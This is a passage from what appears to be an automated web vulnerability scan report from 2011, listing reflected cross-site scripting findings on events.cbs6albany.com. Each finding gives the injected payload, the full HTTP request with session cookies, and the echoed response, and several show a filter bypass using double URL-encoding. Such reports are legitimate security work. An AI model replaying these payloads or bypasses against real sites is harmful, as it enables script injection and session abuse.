Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:02:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "d123457c4ed5651238ca2afbf5dcabac"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=HsppwAf-8ZBZ8sAKo3MFBg.100055542; path=/; expires=Sun, 29-Jan-2012 02:02:40 GMT
Set-Cookie: zvents_tracker_sid=HsppwAf-8ZBZ8sAKo3MFBg.100055542; path=/; expires=Sun, 29-Jan-2012 02:02:40 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMWJiZTYwZDI2NGMyM2U3ZjJjMDNjOGI2N2RmYmY3MGUiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--acc9a8184bf0ed5c3298879bf07f62496c6221fb; path=/; expires=Fri, 29-Apr-2011 02:02:40 GMT; HttpOnly
Content-Length: 49459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1&bd942"><script>alert(1)</script>22ceebdf215=1" />
...[SNIP]...

4.408. http://events.cbs6albany.com/albany-ny/events [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0aa"><script>alert(1)</script>32bdd3a6cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events?cb0aa"><script>alert(1)</script>32bdd3a6cef=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:39:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 56
ETag: "8b123d3df63ac4fb695485452346aa0f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:39:09 GMT; HttpOnly
Content-Length: 49688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events?cb0aa"><script>alert(1)</script>32bdd3a6cef=1" />
...[SNIP]...

4.409. http://events.cbs6albany.com/albany-ny/events/business+tech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/business+tech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578e3"><script>alert(1)</script>09fec9f16b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events/business+tech?578e3"><script>alert(1)</script>09fec9f16b2=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:43:01 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 98
ETag: "c7f1540b5552f415f3bff2792fecec91"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:43:01 GMT; HttpOnly
Content-Length: 18466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events/business+tech?578e3"><script>alert(1)</script>09fec9f16b2=1" />
...[SNIP]...

4.410. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/performing+arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f39fa"><a>eda79b0a89f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nyf39fa"><a>eda79b0a89f/events/performing+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 389
ETag: "22e832e3bdbcba103b33f9260d9d0544"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZjM5ZmEiPjxhPmVkYTc5YjBhODlmIgpzdGF0ZSIHTlk%3D--4d4c7f5d1df1722d29d80ffc4f2b82f86bc7b0d2; path=/; expires=Fri, 29-Apr-2011 05:49:19 GMT; HttpOnly
Content-Length: 33703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nyf39fa"><a>eda79b0a89f/events/performing+arts" />
...[SNIP]...

4.411. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/performing+arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9b91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bb2d08bb55 was submitted in the REST URL parameter 3. This input was echoed as e9b91"><script>alert(1)</script>5bb2d08bb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albany-ny/events/performing+artse9b91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bb2d08bb55 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:57:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 112
ETag: "90bbb0f01fa66fa7daa63c769423b98e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:57:45 GMT; HttpOnly
Content-Length: 15704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:title" content="Albany Performing Artse9b91"><script>alert(1)</script>5bb2d08bb55 Events" />
...[SNIP]...

4.412. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/performing+arts

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61 was submitted in the REST URL parameter 3. This input was echoed as a1daa<script>alert(1)</script>f524f3c9c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albany-ny/events/performing+artsa1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:00:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 524
ETag: "5dd70bb35d7bc467849bc876b148460e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:00:05 GMT; HttpOnly
Content-Length: 15608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<h1 class="label">Albany Performing Artsa1daa<script>alert(1)</script>f524f3c9c61 Events</h1>
...[SNIP]...

4.413. http://events.cbs6albany.com/albany-ny/events/performing+arts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/performing+arts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fbbe"><script>alert(1)</script>0379cee7c4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events/performing+arts?3fbbe"><script>alert(1)</script>0379cee7c4e=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 850
ETag: "7c6a4fe5e2127ec49e4352f1cc5521ca"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:27 GMT; HttpOnly
Content-Length: 33773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events/performing+arts?3fbbe"><script>alert(1)</script>0379cee7c4e=1" />
...[SNIP]...

4.414. http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/visual+arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9ca"><a>b614a586adb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nydc9ca"><a>b614a586adb/events/visual+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:51:59 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 565
ETag: "194ae3a287ac1425b74cd812824f4e94"
